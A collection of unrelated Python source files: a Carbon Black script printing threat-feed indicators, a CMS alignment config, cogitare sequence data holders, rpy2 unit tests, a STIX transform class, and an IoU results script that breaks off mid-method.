parser.add_option("-n", "--no-ssl-verify", action="store_false", default=True, dest="ssl_verify",
help="Do not verify server SSL certificate.")
parser.add_option("-i", "--id", action="store", default=None, dest="feedid",
help="Id of feed of which the specified report is a part of")
parser.add_option("-r", "--reportid", action="store", default=None, dest="reportid",
help="Id of report to query; this may be alphanumeric")
return parser
def get_ioc_counts(iocs):
"""
returns counts of md5s, ipv4s, domains, and queries as a tuple given a feed report ioc block
"""
return len(iocs.get('md5', [])), \
len(iocs.get('ipv4', [])), \
len(iocs.get('dns', [])), \
len(iocs.get('query', []))
def main(argv):
parser = build_cli_parser()
opts, args = parser.parse_args(argv)
if not opts.server_url or not opts.token or not opts.feedid or not opts.reportid:
print "Missing required param; run with --help for usage"
sys.exit(-1)
# build a cbapi object
#
cb = cbapi.CbApi(opts.server_url, token=opts.token, ssl_verify=opts.ssl_verify)
# retrieve threat report
#
report = cb.feed_report_info(opts.feedid, opts.reportid)
# get ioc counts
#
count_md5s, count_ipv4s, count_domains, count_queries = get_ioc_counts(report.get('iocs', {}))
# output the threat report details
#
print report["title"]
print "-" * 80
print
print " Report Summary"
print " %s" % ("-" * 78)
print " %-20s : %s" % ("Score", report["score"])
print " %-20s : %s" % ("Report Id", report["id"])
print " %-20s : %s" % ("Link", report["link"])
print " %-20s : %s" % ("Report Timestamp", time.strftime('%Y-%m-%d %H:%M:%S GMT', time.localtime(report["timestamp"])))
print " %-20s : %s" % ("Total IOC count", count_md5s + count_ipv4s + count_domains + count_queries)
print
print " Feed Details"
print " %s" % ("-" * 78)
print " %-20s : %s" % ("Feed Name", report["feed_name"])
print " %-20s : %s" % ("Feed Id", report["feed_id"])
print
print " Report IOCs"
print " %s" % ("-" * 78)
print
if count_md5s > 0:
print " MD5"
print " %s" % ("-" * 76)
for md5 in report["iocs"]["md5"]:
print " %s" % md5
print
if count_ipv4s > 0:
print " IPv4"
print " %s" % ("-" * 76)
for ipv4 in report["iocs"]["ipv4"]:
print " %s" % ipv4
print
if count_domains > 0:
print " Domain"
print " %s" % ("-" * 76)
for domain in report["iocs"]["dns"]:
print " %s" % domain
print
if count_queries > 0:
print " Query"
print " %s" % ("-" * 76)
print " %-18s : %s" % ("Query", report["iocs"]["query"][0]["search_query"])
print " %-18s : %s" % ("Index Type", report["iocs"]["query"][0]["index_type"])
print
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
412143
|
import FWCore.ParameterSet.Config as cms
from Alignment.APEEstimation.ApeEstimator_cfi import *
from Alignment.APEEstimation.SectorBuilder_cff import *
ApeEstimator = ApeEstimatorTemplate.clone(
maxTracksPerEvent = 0,
#applyTrackCuts = False,
minGoodHitsPerTrack = 1,
residualErrorBinning = [0.0005,0.0010,0.0015,0.0020,0.0025,0.0030,0.0035,0.0040,0.0050,0.0070,0.0100], # 5-100um
#zoomHists = False,
vErrHists = [1],
#Sectors = SubdetSectors,
#Sectors = TIBTOBQuarters,
#Sectors = TIBTOBQuarters2DSeparation,
#Sectors = TIBTOBPitchAnd2DSeparation,
#Sectors = TIBTOBLayerAndOrientationSeparation,
#Sectors = TIDTECSideAndRingAndOrientationSeparation,
Sectors = RecentSectors,
tjTkAssociationMapTag = "TrackRefitterHighPurityForApeEstimator",
)
ApeEstimator.HitSelector.width = [3,3]
ApeEstimator.HitSelector.maxIndex = [1,1]
#ApeEstimator.HitSelector.edgeStrips = [2,800] # exclude first (and so also last) strip
ApeEstimator.HitSelector.sOverN = [20.,50.]
ApeEstimator.HitSelector.chargePixel = [10000., 2000000.]
ApeEstimator.HitSelector.widthX = [2,1000]
ApeEstimator.HitSelector.widthY = [2,1000]
ApeEstimator.HitSelector.logClusterProbability = [-5.,1.]
ApeEstimator.HitSelector.isOnEdge = [0,0]
ApeEstimator.HitSelector.qBin = [1,3]
# Why is charge and maxCharge double, not int?
#ApeEstimator.HitSelector.maxCharge = [0.,250.]
ApeEstimator.HitSelector.chargeOnEdges = [0.,0.5]
#ApeEstimator.HitSelector.phiSensX = [-1.0472,1.0472] # [-60,60] degree
#ApeEstimator.HitSelector.phiSensY = [-1.0472,1.0472] # [-60,60] degree
#ApeEstimator.HitSelector.errXHit = cms.vdouble(0.,0.0060) # 60um, to exclude very large clusters
ApeAnalyzer = ApeEstimator.clone(
Sectors = ValidationSectors,
analyzerMode = True,
calculateApe = True,
)
|
412150
|
from cogitare.data.dataholder import AbsDataHolder
from six import add_metaclass
from six.moves import zip_longest
from abc import ABCMeta
import torch
import numpy
@add_metaclass(ABCMeta)
class SequentialAbsDataHolder(AbsDataHolder):
"""
This class is an extension of :class:`~cogitare.data.AbsDataHolder` to support
sequential data, iterating over the batches and over timesteps. Its the recommended
interface for using with :class:`~cogitare.SequentialModel`.
An abstract object that acts as a data holder. A data holder is a utility to hold
datasets, which provide some simple functions to work with the dataset, such as
sorting, splitting, dividing it into chunks, loading batches using multi-thread, and so on.
It's the recommended way to pass data to Cogitare's models because it already
provides a compatible interface to iterate over batches and timesteps.
To improve the performance, the data holder loads batches using multiprocessing and multithreading
data loader with `Dask <http://dask.pydata.org/>`_.
Usually, this object should not be used directly, only if you are developing a custom
data loader. Cogitare already provides the following implementations for the most
common data types:
- Sequence from Tensors: :class:`~cogitare.data.SequentialTensorHolder`
- Sequence from Numpy: :class:`~cogitare.data.SequentialNumpyHolder`
- Sequence from Callable (functions that receive the sample id, and returns its
data): :class:`~cogitare.data.SequentialCallableHolder`
- :class:`~cogitare.data.SequentialAutoHolder`: inspect the data to choose one of the available data holders.
Args:
data (torch.Tensor, numpy.ndarray, callable): the data to be managed by the data holder.
batch_size (int): the size of the batch.
shuffle (bool): if True, shuffles the dataset after each iteration.
drop_last (bool): if True, then skip the batch if its size is lower that **batch_size** (can
occur in the last batch).
total_samples (int): the number of total samples. If provided, this will limit the
number of samples to be accessed in the data.
mode (str): must be one of: 'sequential', 'threaded', 'multiprocessing'. Use one of them
to choose the batch loading methods. Take a loook
here: https://dask.pydata.org/en/latest/scheduler-choice.html for an overview
of the advantage of each mode.
padding_value: this value will be used to pad sequences with different
sizes in the same batch. When loading a batch, all sequences will have
the same size. The padding_value is added to the right of each sequence to match the size
of the longest sequence in the batch.
sort_by_len (int): if True, the sequences in the batch will be sorted by decreasing size. This is
useful to be load data for torch rnn.PackedSequence. If True, the iterator will return a
tuple with (data, original indices, sizes).
"""
@property
def padding_value(self):
"""The value used to pad sequences with different size in the same batch
"""
return self._padding_value
@padding_value.setter
def padding_value(self, value):
self._padding_value = value
def __init__(self, *args, **kwargs):
self._padding_value = kwargs.pop('padding_value', None)
self._sort_by_len = kwargs.pop('sort_by_len', False)
super(SequentialAbsDataHolder, self).__init__(*args, **kwargs)
def __iter__(self):
return self
def __next__(self):
batch = super(SequentialAbsDataHolder, self).__next__()
if self._sort_by_len:
lengths = [len(v) for v in batch]
indices = [v[0] for v in sorted(enumerate(lengths), reverse=True, key=lambda x: x[1])]
sorted_batch = [batch[i] for i in indices]
sorted_lengths = [lengths[i] for i in indices]
data = zip_longest(*sorted_batch, fillvalue=self.padding_value)
return list(data), indices, sorted_lengths
else:
data = zip_longest(*batch, fillvalue=self.padding_value)
return list(data)
next = __next__
class SequentialCallableHolder(SequentialAbsDataHolder):
"""SequentialCallableHolder is a data holder for abritary data type.
As data input, it uses a callable that receive the sample index as parameter,
and must return the sample (an interator with all the timesteps for the sample).
It can be used to load non-Tensor or non-numpy datasets, such as texts, dicts, and anything else.
You are free to use SequentialCallableHolder with any data type. As a requirement for sequential models,
the returned value must be an iterator containing the timesteps, and have the length attribute.
.. note:: When using SequentialCallableHolder, you must specify the number of samples
in the dataset. The callable will be called asking for samples from 0 to (total_samples - 1).
Example::
>>> def load_sample(idx):
... # the idx'th sample with 3 features per timestep, and #idx timesteps
... return [(i, i, i) for i in range(idx)]
>>> # when using the SequentialCallableHolder. you must pass the number of samples to
>>> # be loaded.
>>> # you can set the total_samples using the parameter in the constructor
>>> data = SequentialCallableHolder(load_sample, batch_size=2, total_samples=5)
>>> # or by setting the property
>>> data.total_samples = 5
>>> batch = next(data)
>>> batch
[((0, 0, 0), (0, 0, 0)), (None, (1, 1, 1)), (None, (2, 2, 2)), (None, (3, 3, 3))]
>>> for timestep, data in enumerate(batch, 1):
... print('Current timestep: ' + str(timestep))
... print(data)
Current timestep: 1
((0, 0, 0), (0, 0, 0))
Current timestep: 2
(None, (1, 1, 1))
Current timestep: 3
(None, (2, 2, 2))
Current timestep: 4
(None, (3, 3, 3))
>>> # in the example above, the first sequence had length 1, and the second
>>> # length 4. The first one was padded with None.
>>> # to pad with a different value, use:
>>> data = SequentialCallableHolder(load_sample, batch_size=2,
... total_samples=5, padding_value=-1)
>>> batch = next(data)
>>> batch
[((0, 0, 0), (0, 0, 0)), ((1, 1, 1), (1, 1, 1)), ((2, 2, 2), -1), ((3, 3, 3), -1)]
>>> for timestep, data in enumerate(batch, 1):
... print('Current timestep: ' + str(timestep))
... print(data)
Current timestep: 1
((0, 0, 0), (0, 0, 0))
Current timestep: 2
((1, 1, 1), (1, 1, 1))
Current timestep: 3
((2, 2, 2), -1)
Current timestep: 4
((3, 3, 3), -1)
"""
def get_sample(self, key):
return self._data(key)
class SequentialTensorHolder(SequentialAbsDataHolder):
"""A data holder for sequences in :class:`torch.Tensor`.
The tensor must have the shape (N, S, \*), where:
- N is batch size (number of samples in the tensor);
- S is the sequence length
The :class:`~cogitare.data.SequentialTensorHolder` will first iterate over the batches,
getting ``batch_size`` samples from the first dimension. And the will iterate over the second
dimension of the mini-batch.
Example::
>>> tensor = torch.Tensor([[1,2,3], [4,5,6], [7,8,9]])
>>> tensor
1 2 3
4 5 6
7 8 9
[torch.FloatTensor of size 3x3]
>>> data = SequentialTensorHolder(tensor, batch_size=2)
>>> batch = next(data)
>>> batch
[(1.0, 7.0), (2.0, 8.0), (3.0, 9.0)]
>>> for timestep, data in enumerate(batch, 1):
... print('Current timestep: ' + str(timestep))
... print(data)
Current timestep: 1
(1.0, 7.0)
Current timestep: 2
(2.0, 8.0)
Current timestep: 3
(3.0, 9.0)
"""
def __init__(self, *args, **kwargs):
super(SequentialTensorHolder, self).__init__(*args, **kwargs)
self._total_samples = len(self._data)
def get_sample(self, key):
return self._data[key]
def SequentialNumpyHolder(data, *args, **kwargs):
"""
When creating the object, it converts the numpy data to Tensor using
:func:`torch.from_numpy` and then creates an :class:`~cogitare.data.SequentialTensorHolder`
instance.
"""
data = torch.from_numpy(data)
return SequentialTensorHolder(data=data, *args, **kwargs)
def SequentialAutoHolder(data, *args, **kwargs):
"""Check the data type to infer which sequential data holder to use.
"""
if isinstance(data, numpy.ndarray):
return SequentialNumpyHolder(data, *args, **kwargs)
if torch.is_tensor(data):
return SequentialTensorHolder(data, *args, **kwargs)
if callable(data):
return SequentialCallableHolder(data, *args, **kwargs)
raise ValueError('Unable to infer data type!')
|
412173
|
import unittest
import copy
import gc
from rpy2 import rinterface
rinterface.initr()
class SexpTestCase(unittest.TestCase):
def testNew_invalid(self):
x = "a"
self.assertRaises(ValueError, rinterface.Sexp, x)
def testNew(self):
sexp = rinterface.baseenv.get("letters")
sexp_new = rinterface.Sexp(sexp)
idem = rinterface.baseenv.get("identical")
self.assertTrue(idem(sexp, sexp_new)[0])
sexp_new2 = rinterface.Sexp(sexp)
self.assertTrue(idem(sexp, sexp_new2)[0])
del(sexp)
self.assertTrue(idem(sexp_new, sexp_new2)[0])
def testTypeof_get(self):
sexp = rinterface.baseenv.get("letters")
self.assertEqual(sexp.typeof, rinterface.STRSXP)
sexp = rinterface.baseenv.get("pi")
self.assertEqual(sexp.typeof, rinterface.REALSXP)
sexp = rinterface.baseenv.get("plot")
self.assertEqual(sexp.typeof, rinterface.CLOSXP)
def testList_attrs(self):
x = rinterface.IntSexpVector((1,2,3))
self.assertEqual(0, len(x.list_attrs()))
x.do_slot_assign('a', rinterface.IntSexpVector((33,)))
self.assertEqual(1, len(x.list_attrs()))
self.assertTrue('a' in x.list_attrs())
def testDo_slot(self):
data_func = rinterface.baseenv.get("data")
data_func(rinterface.SexpVector(["iris", ], rinterface.STRSXP))
sexp = rinterface.globalenv.get("iris")
names = sexp.do_slot("names")
iris_names = ("Sepal.Length", "Sepal.Width", "Petal.Length", "Petal.Width", "Species")
self.assertEqual(len(iris_names), len(names))
for i, n in enumerate(iris_names):
self.assertEqual(iris_names[i], names[i])
self.assertRaises(LookupError, sexp.do_slot, "foo")
def testDo_slot_emptyString(self):
sexp = rinterface.baseenv.get('pi')
self.assertRaises(ValueError, sexp.do_slot, "")
def testDo_slot_assign(self):
data_func = rinterface.baseenv.get("data")
data_func(rinterface.SexpVector(["iris", ], rinterface.STRSXP))
sexp = rinterface.globalenv.get("iris")
iris_names = rinterface.StrSexpVector(['a', 'b', 'c', 'd', 'e'])
sexp.do_slot_assign("names", iris_names)
names = [x for x in sexp.do_slot("names")]
self.assertEqual(['a', 'b', 'c', 'd', 'e'], names)
def testDo_slot_assign_create(self):
#test that assigning slots is also creating the slot
x = rinterface.IntSexpVector([1,2,3])
x.do_slot_assign("foo", rinterface.StrSexpVector(["bar", ]))
slot = x.do_slot("foo")
self.assertEqual(1, len(slot))
self.assertEqual("bar", slot[0])
def testDo_slot_assign_emptyString(self):
#test that assigning slots is also creating the slot
x = rinterface.IntSexpVector([1,2,3])
self.assertRaises(ValueError,
x.do_slot_assign, "",
rinterface.StrSexpVector(["bar", ]))
def testSexp_rsame_true(self):
sexp_a = rinterface.baseenv.get("letters")
sexp_b = rinterface.baseenv.get("letters")
self.assertTrue(sexp_a.rsame(sexp_b))
def testSexp_rsame_false(self):
sexp_a = rinterface.baseenv.get("letters")
sexp_b = rinterface.baseenv.get("pi")
self.assertFalse(sexp_a.rsame(sexp_b))
def testSexp_rsame_wrongType(self):
sexp_a = rinterface.baseenv.get("letters")
self.assertRaises(ValueError, sexp_a.rsame, 'foo')
def testSexp_sexp(self):
sexp = rinterface.IntSexpVector([1,2,3])
sexp_count = sexp.__sexp_refcount__
sexp_cobj = sexp.__sexp__
d = dict(rinterface._rinterface.protected_rids())
self.assertEqual(sexp_count, d[sexp.rid])
self.assertEqual(sexp_count, sexp.__sexp_refcount__)
sexp2 = rinterface.IntSexpVector([4,5,6,7])
sexp2_rid = sexp2.rid
sexp2.__sexp__ = sexp_cobj
del(sexp)
gc.collect()
d = dict(rinterface._rinterface.protected_rids())
self.assertEqual(None, d.get(sexp2_rid))
def testSexp_rclass_get(self):
sexp = rinterface.baseenv.get("letters")
self.assertEqual(len(sexp.rclass), 1)
self.assertEqual(sexp.rclass[0], "character")
sexp = rinterface.baseenv.get("matrix")(0)
self.assertEqual(len(sexp.rclass), 1)
self.assertEqual(sexp.rclass[0], "matrix")
def testSexp_rclass_set(self):
sexp = rinterface.IntSexpVector([1,2,3])
sexp.rclass = rinterface.StrSexpVector(['foo'])
self.assertEqual(len(sexp.rclass), 1)
self.assertEqual(sexp.rclass[0], "foo")
def testSexp_sexp_wrongtypeof(self):
sexp = rinterface.IntSexpVector([1,2,3])
cobj = sexp.__sexp__
sexp = rinterface.StrSexpVector(['a', 'b'])
self.assertEqual(2, len(sexp))
self.assertRaises(ValueError, sexp.__setattr__, '__sexp__', cobj)
def testSexp_sexp_UniqueCapsule(self):
sexp = rinterface.IntSexpVector([1,2,3])
sexp_count = sexp.__sexp_refcount__
cobj = sexp.__sexp__
# check that no increase in the refcount: the capsule is unique
self.assertEqual(sexp_count, sexp.__sexp_refcount__)
self.assertEqual(sexp_count,
dict(rinterface.protected_rids())[sexp.rid])
del(cobj)
gc.collect()
self.assertEqual(sexp_count, sexp.__sexp_refcount__)
self.assertEqual(sexp_count,
dict(rinterface.protected_rids())[sexp.rid])
sexp_rid = sexp.rid
del(sexp)
gc.collect()
self.assertFalse(sexp_rid in dict(rinterface.protected_rids()))
def testSexp_sexp_set(self):
x = rinterface.IntSexpVector([1,2,3])
x_s = x.__sexp__
x_rid = x.rid
# The Python reference count of the capsule is incremented,
# not the rpy2 reference count
self.assertEqual(1, x.__sexp_refcount__)
y = rinterface.IntSexpVector([4,5,6])
y_count = y.__sexp_refcount__
y_rid = y.rid
self.assertEqual(1, y_count)
self.assertTrue(x_rid in [elt[0] for elt in rinterface.protected_rids()])
x.__sexp__ = y.__sexp__
self.assertFalse(x_rid in [elt[0] for elt in rinterface.protected_rids()])
self.assertEqual(x.rid, y.rid)
self.assertEqual(y_rid, y.rid)
# now both x and y point to the same capsule, making
# the rpy2 reference count to 2
self.assertEqual(x.__sexp_refcount__, y.__sexp_refcount__)
self.assertEqual(y_count+1, x.__sexp_refcount__)
del(x)
self.assertTrue(y_rid in [elt[0] for elt in rinterface.protected_rids()])
del(y)
self.assertFalse(y_rid in [elt[0] for elt in rinterface.protected_rids()])
def testSexp_deepcopy(self):
sexp = rinterface.IntSexpVector([1,2,3])
self.assertEqual(0, sexp.named)
rinterface.baseenv.get("identity")(sexp)
self.assertEqual(2, sexp.named)
sexp2 = sexp.__deepcopy__()
self.assertEqual(sexp.typeof, sexp2.typeof)
self.assertEqual(list(sexp), list(sexp2))
self.assertFalse(sexp.rsame(sexp2))
self.assertEqual(0, sexp2.named)
# should be the same as above, but just in case:
sexp3 = copy.deepcopy(sexp)
self.assertEqual(sexp.typeof, sexp3.typeof)
self.assertEqual(list(sexp), list(sexp3))
self.assertFalse(sexp.rsame(sexp3))
self.assertEqual(0, sexp3.named)
def testRID(self):
globalenv_id = rinterface.baseenv.get('.GlobalEnv').rid
self.assertEqual(globalenv_id, rinterface.globalenv.rid)
class RNULLTestCase(unittest.TestCase):
def testRNULLType_nonzero(self):
NULL = rinterface.RNULLType()
self.assertFalse(NULL)
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(SexpTestCase)
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(RNULLTestCase))
return suite
if __name__ == '__main__':
tr = unittest.TextTestRunner(verbosity = 2)
tr.run(suite())
|
412185
|
import logging
import pprint
import copy
import types
import six
from mixbox.entities import EntityList
from cybox.core import Object
from cybox.common import ObjectProperties
from stix.core import STIXPackage
import certau.util.stix.helpers as stix_helpers
class StixTransform(object):
"""Base class for transforming a STIX package to an alternate format.
This class provides helper functions for processing
:py:class:`STIXPackage<stix.core.stix_package.STIXPackage>` elements.
This class should be extended by other classes that
transform STIX packages into alternate formats.
The default constructor processes a STIX package to initialise
self.observables, a :py:class:`dict` keyed by object type.
Each entry contains a list :py:class:`list` of :py:class:`dict` objects
with three keys: 'id', 'observable', and 'fields', containing the
observable ID, the :py:class:`Observable<cybox.core.observable.Observable>`
object itself, and extracted fields, respectively.
Args:
package: the STIX package to transform
Attributes:
OBJECT_FIELDS: a :py:class:`dict` of supported Cybox object types
and fields ('properties'). The dictionary is keyed by Cybox object
type string (see :py:func:`_observable_object_type`) with each
entry containing a list of field names from that object that will
be utilised during the transformation.
Field names may reference sub-objects using dot notation.
For example the Cybox EmailMessage class contains a `header` field
referring to an EmailHeader object which contains a `to` field.
This field can be referenced using the notation `header.to`.
If OBJECT_FIELDS evaluates to False (e.g. empty dict()), it is
assumed all object types are supported.
OBJECT_CONSTRAINTS: a :py:class:`dict` of constraints on the
supported object types based on 'categories' associated with that
type. For example, the Cybox Address object uses the field
`category` to distinguish between IPv4, IPv6 and even email
addresses. Like OBJECT_FIELDS, the dictionary is keyed by object
type. Each entry contains a dictionary keyed by field name,
containing a list of values, or categories, (for that field name)
that are supported by the transform.
Note. Does not support the expression of more complex constraints,
for example combining different categories.
STRING_CONDITION_CONSTRAINT: a :py:class:`list` of string condition
values supported by the transform. For example, some transforms
may not support 'FitsPattern' or 'StartsWith' string condition
values. Use this to list the supported values. Note the values
are strings, even 'None'.
"""
# Class constants - see descriptions above
OBJECT_FIELDS = dict()
OBJECT_CONSTRAINTS = dict()
STRING_CONDITION_CONSTRAINT = list()
def __init__(self, package, default_title=None, default_description=None,
default_tlp='AMBER'):
self.package = package
self.observables = self._observables_for_package(package)
self.default_title = default_title
self.default_description = default_description
self.default_tlp = default_tlp
# Initialise the logger
self._logger = logging.getLogger()
self._logger.debug('%s object created', self.__class__.__name__)
# ##### Properties
@property
def package(self):
return self._package
@package.setter
def package(self, package):
if not isinstance(package, STIXPackage):
raise TypeError('expected STIXPackage object')
self._package = package
@property
def default_title(self):
return self._default_title
@default_title.setter
def default_title(self, title):
self._default_title = '' if title is None else str(title)
@property
def default_description(self):
return self._default_description
@default_description.setter
def default_description(self, description):
if description is None:
self._default_description = ''
else:
self._default_description = str(description)
@property
def default_tlp(self):
return self._default_tlp
@default_tlp.setter
def default_tlp(self, tlp):
if str(tlp) not in stix_helpers.TLP_COLOURS:
raise TypeError('invalid TLP colour')
self._default_tlp = str(tlp)
@property
def observables(self):
return self._observables
@observables.setter
def observables(self, observables):
self._observables = observables
# ##### Helpers for extracting various STIX package elements. #####
def package_title(self):
"""Retrieves the STIX package title (str) from the header."""
title = stix_helpers.package_title(self.package)
return title or self.default_title
def package_description(self):
"""Retrieves the STIX package description (str) from the header."""
description = stix_helpers.package_description(self.package)
return description or self.default_description
def package_tlp(self):
"""Retrieves the STIX package TLP (str) from the header."""
tlp = stix_helpers.package_tlp(self.package)
return tlp or self.default_tlp
# ### Internal methods for processing observables, objects and properties.
@staticmethod
def _observable_properties(observable):
"""Retrieves an observable's object's properties.
Args:
observable: a :py:class:`cybox.Observable` object
Returns:
:py:class:`cybox.ObjectProperties`: the properties from the
observable's object (if they exist), otherwise None.
"""
if (isinstance(observable.object_, Object) and
isinstance(observable.object_.properties, ObjectProperties)):
return observable.object_.properties
else:
return None
@staticmethod
def _observable_object_type(observable):
"""Determine the object type of an observable's object.
Observable object's properties are Cybox object types which extend
the ObjectProperties class. The class name for these objects is
used to represent the object type.
Args:
observable: a :py:class:`cybox.Observable` object
Returns:
str: a string representation of the observable's object properties
type, or None if observable contains no properties.
"""
properties = StixTransform._observable_properties(observable)
return properties.__class__.__name__ if properties else None
@staticmethod
def _condition_key_for_field(field):
"""Dictionary key used for storing the string condition of a field."""
return field + '_condition'
@classmethod
def _observables_for_package(cls, package):
"""Extract observables from a STIX package.
Collects observables from a STIX package and groups them by object
type. Only observables with an ID and containing a Cybox object are
returned. Results are returned in a dictionary keyed by object
type - see :py:func:`_observable_object_type`.
If OBJECT_FIELDS are specified only observables containing the
object types listed will be returned, and only those with at
least one of the listed fields containing a non-trivial value.
OBJECT_CONSTRAINTS and STRING_CONDITION_CONSTRAINT are also applied.
If no OBJECT_FIELDS are specified no constraints are applied and all
identified observables are returned.
Observables are sought from the following locations:
- the root of the STIX package
- within Indicator objects (where the indicators are in the package
root)
- within ObservableComposition objects found in either of the two
previous locations
Args:
package: a :py:class:`stix:STIXPackage` object
Returns:
dict: a dictionary of valid observables, keyed by object type
(See description above). May be empty.
"""
def _add_observables(new_observables):
for observable in new_observables:
if observable.observable_composition is not None:
_add_observables(
observable.observable_composition.observables
)
else:
object_type = cls._observable_object_type(observable)
if (observable.id_ is not None and
observable.id_ not in observable_ids and
object_type is not None):
object_type = cls._observable_object_type(observable)
if object_type in cls.OBJECT_FIELDS.keys():
fields = cls._field_values_for_observable(
observable
)
if not fields:
continue
elif not cls.OBJECT_FIELDS:
fields = None
else:
continue
if object_type not in observables:
observables[object_type] = []
new_observable = dict(
id=observable.id_,
observable=observable,
fields=fields,
)
observables[object_type].append(new_observable)
observable_ids.append(observable.id_)
# Look for observables in the package root and in indicators
observable_ids = []
observables = dict()
if package.observables:
_add_observables(package.observables)
if package.indicators:
for i in package.indicators:
if i.observables:
_add_observables(i.observables)
return observables
@classmethod
def _field_values_for_observable(cls, observable):
"""Collects property field values for an observable."""
object_type = cls._observable_object_type(observable)
fields = list(cls.OBJECT_FIELDS[object_type])
# Add any fields required for constraint checking
if object_type in cls.OBJECT_CONSTRAINTS.keys():
for field in cls.OBJECT_CONSTRAINTS[object_type]:
if field not in fields:
fields.append(field)
# Get field values
values = []
properties = cls._observable_properties(observable)
cls._field_values_for_entity(values, properties, fields)
# Check constraints
if object_type in cls.OBJECT_CONSTRAINTS.keys():
for field in cls.OBJECT_CONSTRAINTS[object_type]:
for value in values:
# Multiple constraints are combined with an implied 'AND'
# (i.e. all of the constraints must be satisfied)
if (field not in value or value[field] not in
cls.OBJECT_CONSTRAINTS[object_type][field]):
values.remove(value)
break
# Remove the constraint field if not needed
if field not in cls.OBJECT_FIELDS[object_type]:
del value[field]
return values
@classmethod
def _field_values_for_entity(cls, values, entity, fields, first_part=''):
"""Returns requested field values from a cybox.Entity object."""
def _first_parts(fields):
"""Get the bits on the left of the first dot in the field names.
"""
first_parts = set()
for field in fields:
parts = field.split('.')
first_parts.add(parts[0])
return first_parts
def _next_parts(fields, field):
"""Get the next parts for this field."""
next_parts = set()
first_part = field + '.'
for field in fields:
if field.startswith(first_part):
next_parts.add(field[len(first_part):])
return next_parts
def _convert_to_str(value):
if six.PY2:
if isinstance(value, basestring):
return value.encode('utf-8')
else:
return pprint.pformat(value)
else:
return str(value)
def _get_value_condition(value):
"""Set the condition value to '-' if the field doesn't have a
condition attribute to allow us to differentiate it from a value
that does contain a condition attribute, but its value is None.
"""
condition = getattr(value, 'condition', '-')
value = getattr(value, 'value', value)
return (_convert_to_str(value), _convert_to_str(condition))
def _add_value_to_dict(dict_, value, field):
value, condition = _get_value_condition(value)
if value and (not cls.STRING_CONDITION_CONSTRAINT or
condition in cls.STRING_CONDITION_CONSTRAINT or
condition == '-'):
dict_[field] = value
if condition != '-':
c_field = cls._condition_key_for_field(field)
dict_[c_field] = condition
def _add_value_to_values(values, value, field):
"""Add value and condition (if present) to results."""
if values:
for dict_ in values:
_add_value_to_dict(dict_, value, field)
else:
# First entry
dict_ = dict()
_add_value_to_dict(dict_, value, field)
if dict_:
values.append(dict_)
for field in _first_parts(fields):
full_first_part = first_part + '.' + field if first_part else field
next_parts = _next_parts(fields, field)
value = getattr(entity, field, None)
# Test if value is not a string and iterable
iterable = False
if not isinstance(value, six.string_types):
try:
iter(value)
iterable = True
except TypeError:
pass
if iterable:
values_copy = copy.deepcopy(values)
first = True
for item in value:
v_list = values if first else copy.deepcopy(values_copy)
if next_parts:
cls._field_values_for_entity(v_list, item, next_parts,
full_first_part)
else:
_add_value_to_values(v_list, item, full_first_part)
if not first:
values.extend(v_list)
else:
first = False
elif value:
if next_parts:
cls._field_values_for_entity(values, value, next_parts,
full_first_part)
else:
_add_value_to_values(values, value, full_first_part)
|
412197
|
from WorkSpace import *
import matplotlib.pyplot as plt
import statistics
import pickle
import pandas as pd
import numpy as np
class Results:
def __init__(self,lr_method,evaluation_config,meta_methods=None,
architecture='FCRN'):
self.architecture = architecture
self.lr_method = lr_method
self.evaluation_config = evaluation_config
self.prefix = os.getcwd()+'/Logging/{}/{}/'
self.wrkspace = ManageWorkSpace(datasets=self.evaluation_config['targets'])
def calc_avg_iou_selections(self,meta_method=None,iou_result_path_prefix=None,
experiment_name=None):
self.wrkspace.create_dir([iou_result_path_prefix + 'CSV/'])
shots = [str(shot)+' shots' for shot in self.evaluation_config['k-shot']]
shots = ['']+shots
iou_list_avg = []
std_iou_avg = []
iou_list_avg.append(shots)
std_iou_avg.append(shots)
for test in self.evaluation_config['targets']:
row_iou = []
std_row_iou = []
row_iou.append(test)
std_row_iou.append(test)
for shot in self.evaluation_config['k-shot']:
iou_result_path = iou_result_path_prefix+str(shot)+'-shot/'+meta_method+\
'/Target_'+test+'/Test_Loss_IoU/' if meta_method!=None else iou_result_path_prefix+str(shot)+'-shot/Target_'+\
test+'/Test_Loss_IoU/'
row_iou_shot_num = []
for selection in self.evaluation_config['selections']:
experiment_name_selection = experiment_name+'_'+str(shot)+'shot_'+test\
+'_Selection_' + str(selection)
try:
f = open(iou_result_path + experiment_name_selection + '.pickle', 'rb')
except FileNotFoundError:
experiment_name_selection = experiment_name + str(shot) + 'shot_' + test \
+ '_Selection_' + str(selection)
f = open(iou_result_path + experiment_name_selection + '.pickle', 'rb')
test_result = pickle.load(f)
iou = test_result[1]
else:
test_result = pickle.load(f)
iou = test_result[1]
f.close()
row_iou_shot_num.append(iou)
temp = [elem for elem in row_iou_shot_num]
std_row_iou.append(round(statistics.stdev(temp), 3))
row_iou.append(sum(row_iou_shot_num) / len(self.evaluation_config['selections']))
iou_list_avg.append(row_iou)
std_iou_avg.append(std_row_iou)
df = pd.DataFrame(iou_list_avg)
df_std = pd.DataFrame(std_iou_avg)
csvFileName = iou_result_path_prefix + 'CSV/'+experiment_name+'_'+meta_method+'.csv' \
if meta_method!=None else iou_result_path_prefix + 'CSV/'+experiment_name+'_.csv'
f = open(csvFileName, 'w')
with f:
df.to_csv(f, header=False, index=False)
df_std.to_csv(f, header=False, index=False)
f.close()
return iou_list_avg,std_iou_avg
def calc_avg_iou_datasets(self,iou, num_datasets):
iou_temp = []
for row in iou[1:]:
temp = row[1:]
iou_temp.append(temp)
iou_temp = np.asarray(iou_temp)
iou_sum = []
for c in range(iou_temp.shape[1]):
temp = []
for r in range(iou_temp.shape[0]):
temp.append(iou_temp[r][c])
iou_sum.append(np.sum(temp) / num_datasets)
return iou_sum
def calc_avg_iou_selections_meta(self,experiment_name = ''):
prefix = self.prefix.format(self.wrkspace.map_dict[self.lr_method],self.architecture)
iou_result_path_prefix = prefix+'Fine-tuned'+'/'
for i,meta_method in enumerate(self.meta_methods,0):
iou_avg_selections, std_avg_selections = self.calc_avg_iou_selections(meta_method,iou_result_path_prefix=iou_result_path_prefix,
experiment_name=experiment_name)
print(iou_avg_selections)
print(std_avg_selections)
def calc_avg_iou_selections_transfer(self,experiment_name=''):
prefix = self.prefix.format(self.wrkspace.map_dict[self.lr_method],self.architecture)
iou_result_path_prefix =prefix+'Fine-tuned/'
